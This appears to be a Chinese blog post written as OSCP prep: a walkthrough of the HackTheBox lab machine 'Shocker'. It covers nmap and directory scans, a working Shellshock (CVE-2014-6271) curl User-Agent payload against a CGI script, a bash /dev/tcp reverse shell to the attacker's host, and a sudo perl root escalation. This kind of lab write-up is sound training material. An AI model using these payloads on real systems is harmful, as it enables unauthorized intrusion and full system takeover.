OSCP备考-2

最新推荐文章于 2024-07-10 18:23:49 发布
最新推荐文章于 2024-07-10 18:23:49 发布
阅读量571 收藏
点赞数
分类专栏: OSCP HTB 文章标签: HTB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40803858/article/details/103329086
版权
OSCP 同时被 2 个专栏收录
3 篇文章 2 订阅
订阅专栏
HTB
2 篇文章 0 订阅
订阅专栏

在这里插入图片描述

继续HTB

这一道题也挺简单。还是经验少不知道这个漏洞
常规namp

root@kali:~/Desktop# nmap -sV -T4 10.10.10.56
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-30 07:54 EST
Nmap scan report for 10.10.10.56
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开了80和 2222 。有web服务先看web ssh是否有漏洞先放着
在这里插入图片描述
web页面就一个图片,没有其余东西(当初还想着图片里面是不是隐写了什么),接着流程扫目录寻找敏感文件。先看(robots.txt)这里用工具dirsearch

Target: http://10.10.10.56
[08:06:38] Starting: 
[08:07:38] 403 -  294B  - /cgi-bin/                                                                               
[08:08:13] 200 -  137B  - /index.html                                                                          
[08:08:56] 403 -  299B  - /server-status                                                                
[08:08:56] 403 -  300B  - /server-status/

发现有cgi-bin 目录,目标web服务使用了CGI(通用网关接口),继续扫该目录看看有没有解析的文件

root@kali:~/Desktop/dirsearch# python3 dirsearch.py  -u 10.10.10.56/cgi-bin/ -e sh,py,cgi
Target: 10.10.10.56/cgi-bin/                                                                                                                                                                                                                                                                                                     [07:17:12] Starting: 
[07:20:01] 200 -  118B  - /cgi-bin/user.sh

这里之后要使用一个漏洞,经验少是整破头也想不出来 。漏洞名称CVE-2014-6271(破壳),不细说这个漏洞。
目前的Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。当执行CGI 时会调用Bash将Referer、host、UserAgent、header等作为环境变量进行处理漏洞大概就是这样的。

root@kali:~/Desktop# curl -A "() { :;};echo ; echo; /bin/bash -c 'whoami'" http://10.10.10.56/cgi-bin/user.sh
shelly

测试成功,反个shell

本地监听9999
curl -A "() { :;};echo ; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/9999 0>&1 '" http://10.10.10.56/cgi-bin/user.sh
成功获取user的flag
shelly@Shocker:/home/shelly$ ls
ls
user.txt

之后进行提权

shelly@Shocker:/home/shelly$ sudo -l //列出用户特权或检查一个特定的命令
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$

可以发现该用户可以 sudo nopasswd起 perl

shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
whoami
root
cd /root
ls
root.txt
cat root.txt

完事——还是菜
https://www.freebuf.com/news/48331.html 漏洞文章

0x516A
关注
专栏目录
OSCP心得
fuckskyboy的博客
09-30 1588
OSCP 2023考试通过经验分享
【Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1650
Oscp备考
备考 OSCP
mksimon的博客
06-29 480
THM 免费初级的玩得差不多,再尝试 HTB,其实两边都还是要看攻略夺旗。 HTB 今天研究着 Remote,表示对入侵 Windows 完全没概念,即使跟着攻略也很吃力,但一看 注会入职 起步 8K,OSCP 起步 15K,继续努力。 ...
信息安全从业者考试认证大全_信息化相关的证书
最新发布
喜欢Python编程的程序员柚柚呀
07-10 1737
这里将按照发证部门来将证书分类介绍。首先,是国内的。国内安全相关大概有:软考,华为系,公安部系,信息安全测评中心系,深信服的SCSA,云安全联盟系列(CCSK/CCCSP),信息安全认证中心的CISAW。软考为中级的信息安全工程师,华为分为中级的HCNP(HCIP)-security及HCIE-security,信息安全测评中心发的一些:cwasp(安全开发认证)、cisp(注册信息安全人员)、cisp-pte(渗透测试方向)、cisp-ire(应急响方向)、 CISP-A(审计方向)、NISP二级等等。
OSCP 备考指南
anlalu233的博客
03-14 1249
OSCP 备考指南https://www.lshack.cn/656/
OSCP-Resources:有助于准备OSCP考试的资源集合
03-07
OSCP资源 有助于准备OSCP考试的资源的集合。 虚拟机/实验室环境 有大量的在线实验室环境可帮助您及时了解漏洞(新旧漏洞)。 HackTheBox -在线实验室环境- VulnHub -弱势虚拟机- TryHackMe -在线实验室环境- VulnServer-缓冲区溢出实践-https: 影片指南 这些是各种实验室机器/ CTF的演练,有助于理解渗透测试方法。 IppSec(YouTube)-https: 有用的工具/资源 准备OSCP考试时可能会派上用场的各种工具。 dirsearch-目录强行强制工具-https: SecLists-单词列表的绝佳集合-https: LinEnum.sh-Linux枚举脚本-https: pspy-Linux进程监视-https: PowerSploit-Windows渗透测试工具包-https: BloodHound-
OSCP备考-1
一个安全路上的菜鸟
11-30 1056
Hackthebox 整起 最简单的一题
【Oscp备考-Kioptrix2】
weixin_44126257的博客
09-16 2006
Oscp备考:Kioptrix Level 2
Oscp备考-Kioptrix4
weixin_44126257的博客
02-28 316
Oscp备考-Kioptrix4
OSCP-Cheat-Sheet:更加努力
03-05
【标题】"OSCP-Cheat-Sheet:更加努力"揭示了这个压缩包文件的主要内容,它是一个关于OSCP(Offensive Security Certified Professional)认证的学习备忘单,旨在帮助备考者更有效地准备考试。OSCP是网络安全领域的一...
oscp
03-26
oscp
OSCP2018十一月考试指导.pdf
11-02
OSCP最新考试2018十一月考试指导,有截图, OSCP 考试是安全考试
OSCP之旅
03-04
OSCP之旅
oscp_cheatsheet:我在成为OSCP的过程中使用的命令,摘要,漏洞利用,工具,列表,集合和技术
03-08
OSCP备忘单 以下集合是我亲自测试并在成为OSCP的过程中使用的命令,摘要,链接,漏洞利用,工具,列表和技术的完整(但结构化)选择。 我将不时扩展,重组和更新它,所以让我们看看它的发展方向。 这项工作正在进行中 免责声明 该备忘单绝对不是“完整的”。 我敢肯定,我忘了写下数百条基本命令,并以错误的方式使用了不必要的标志,其中大部分命令都用了不必要的标记,您可能很快就会问自己,我是如何通过考试做到这一点的。 同样,您可能会认为所使用的某些工具应该位于攻击的另一个阶段(例如,某些nmap漏洞脚本应处于Exploitation中)。 没关系,渗透测试的不同阶段之间的边缘非常模糊。 如果您想帮助改进清单,请随时发布PR。 仅用于教育目的! 表中的内容 侦察 自动侦察 autorecon -vv 192.168.0.1 地图 初始快速TCP扫描 nmap -v -sS -sV -Pn --top
OSCP考试回顾
weixin_30815469的博客
05-15 2486
技术背景 从2011年开始接触学习渗透测试,全职做过的职位有渗透测试,Python后端研发,DevOps,甲方安全打杂. 学习过程 首先考试报名,交钱。买了价值800美元的一个月lab,包含Pentest with Kali的视频教程和一个PDF还有一次考试费用。视频教程和PDF介绍了一些常见工具,没有其他。 3月报名,买了一个月Lab,Lab环境需要预约,最早能预约到报名时间2周后的。 关于OS...
【OSCP
weixin_44126257的博客
10-02 356
基础知识
oscp备考前阅读列表
chelp的专栏
04-23 1529
oscp备考前需要阅读列表
oscp——symfonos:2
王嘟嘟的博客
01-16 4569
0x00 前言 这个是练习的第5个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-2,331/ 参考文章 https://www.anquanke.com/post/id/182378 https://blog.csdn.net/weixin_44214107/article/details/100587936 0x01 实验 1.信息收集 1.1 ...
OSCP历程
Shadow的博客
12-08 1587
今天1点40,我收到了offensive发的邮件,通知我通过了oscp考试!现在总结下吧。 1、笔记很重要,教材一定要看,很多细节都在教材里面,遇到新知识一定要记笔记,每做一台靶机,之后一定要写报告,把你渗透的过程,思路,记录下来。因为当时你觉得可能记住了,但是做了几十台到考试前时候你发现什么都记不住,这时候就需要过一遍你的靶机writeup来回忆相关知识点。 2、官方靶机如果遇到不会的,没头绪的,可以上论坛,看看别人是怎么说的。如果一台靶机做了一天还是一点进展都没有,那就下一台吧,可能...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值